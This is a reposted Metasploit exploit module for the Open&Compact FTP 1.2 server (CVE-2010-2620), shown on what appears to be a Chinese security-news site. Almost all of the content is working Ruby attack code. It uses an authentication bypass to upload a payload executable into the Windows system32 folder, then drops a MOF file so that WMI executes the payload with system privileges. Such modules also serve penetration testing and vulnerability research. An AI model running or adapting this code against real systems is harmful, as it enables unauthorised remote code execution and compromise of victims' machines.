首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Open-FTPD 1.2 Arbitrary File Upload
来源:metasploit.com 作者:Gorbunov 发布时间:2013-08-13   
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Ftp
        include Msf::Exploit::Remote::TcpServer
        include Msf::Exploit::EXE
        include Msf::Exploit::WbemExec
        include Msf::Exploit::FileDropper

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Open-FTPD 1.2 Arbitrary File Upload",
			'Description'    => %q{
				This module exploits multiple vulnerabilities found in Open&Compact FTP
				server. The software contains an authentication bypass vulnerability and a
				arbitrary file upload vulnerability that allows a remote attacker to write
				arbitrary files to the file system as long as there is at least one user
				who has permission.

				Code execution can be achieved by first uploading the payload to the remote
				machine as an exe file, and then upload another mof file, which enables
				WMI (Management Instrumentation service) to execute the uploaded payload.
				Please note that this module currently only works for Windows before Vista.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Serge Gorbunov', # Initial discovery
					'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
				],
			'References'     =>
				[
					['OSVDB', '65687'],
					['EDB',   '13932'],
					['CVE',   '2010-2620']
				],
			'Payload'        =>
				{
					'BadChars' => "\x00",
				},
			'Platform'       => 'win',
			'Stance'         => Msf::Exploit::Stance::Aggressive,
			'Targets'        =>
				[
					# Tested on version 1.2 - Windows XP SP3 (EN)
					['Open&Compact FTP 1.2 on Windows (Before Vista)', {}]
				],
			'Privileged'     => true,
			'DisclosureDate' => "Jun 18 2012",
			'DefaultTarget'  => 0))

		register_options([
			OptString.new('PATH',  [true, 'The local Windows path', "C:/WINDOWS/"]),
			OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
		], self.class)
		deregister_options('FTPUSER', 'FTPPASS') # Using authentication bypass

	end

	def check
		connect
		disconnect

		if banner =~ /\*\*        Welcome on       \*\*/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Unknown
		end
	end

	def on_client_connect(cli)
		peer = "#{cli.peerhost}:#{cli.peerport}"

		case @stage
		when :exe
			print_status("#{peer} - Sending executable (#{@exe.length.to_s} bytes)")
			cli.put(@exe)
			@stage = :mof
		when :mof
			print_status("#{peer} - Sending MOF (#{@mof.length.to_s} bytes)")
			cli.put(@mof)
		end

		cli.close
	end

	# Largely stolen from freefloatftp_wbem.rb
	def upload(filename)
		select(nil, nil, nil, 1)

		peer = "#{rhost}:#{rport}"
		print_status("#{peer} - Trying to upload #{::File.basename(filename)}")
		conn = connect(false, datastore['VERBOSE'])
		if not conn
			fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
		end

		# Switch to binary mode
		print_status("#{peer} - Set binary mode")
		send_cmd(['TYPE', 'I'], true, conn)

		# Prepare active mode: Get attacker's IP and source port
		src_ip   = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
		src_port = datastore['SRVPORT'].to_i

		# Prepare active mode: Convert the IP and port for active mode
		src_ip   = src_ip.gsub(/\./, ',')
		src_port = "#{src_port/256},#{src_port.remainder(256)}"

		# Set to active mode
		print_status("#{peer} - Set active mode \"#{src_ip},#{src_port}\"")
		send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)

		# Tell the FTP server to download our file
		send_cmd(['STOR', filename], false, conn)

		print_good("#{peer} - Upload successful")
		disconnect(conn)
	end

	# Largely stolen from freefloatftp_wbem.rb
	def exploit
		path     = datastore['PATH']
		exe_name = "#{path}/system32/#{rand_text_alpha(rand(10)+5)}.exe"
		mof_name = "#{path}/system32/wbem/mof/#{rand_text_alpha(rand(10)+5)}.mof"
		@mof      = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
		@exe      = generate_payload_exe
		@stage = :exe

		begin
			t = framework.threads.spawn("reqs", false) {
				# Upload our malicious executable
				u = upload(exe_name)
				# Upload the mof file
				upload(mof_name) if u
				register_file_for_cleanup("#{::File.basename(exe_name)}")
				register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
			}

			super
		ensure
			t.kill
		end
	end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Jetaudio 8.0.17 Crash Proof Of
·HP StorageWorks P4000 Virtual
·Sami FTP Server 2.0.1 - MKD Bu
·onehttpd 0.7 - Denial of Servi
·Ruby on Rails Known Secret Ses
·MinaliC Webserver 2.0.0 - Buff
·Squash YAML Code Execution Vul
·Joomla Media Manager File Uplo
·OpenX Backdoor PHP Code Execut
·Chasys Draw IES Buffer Overflo
·Firefox onreadystatechange Eve
·Ultra Mini HTTPD Stack Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved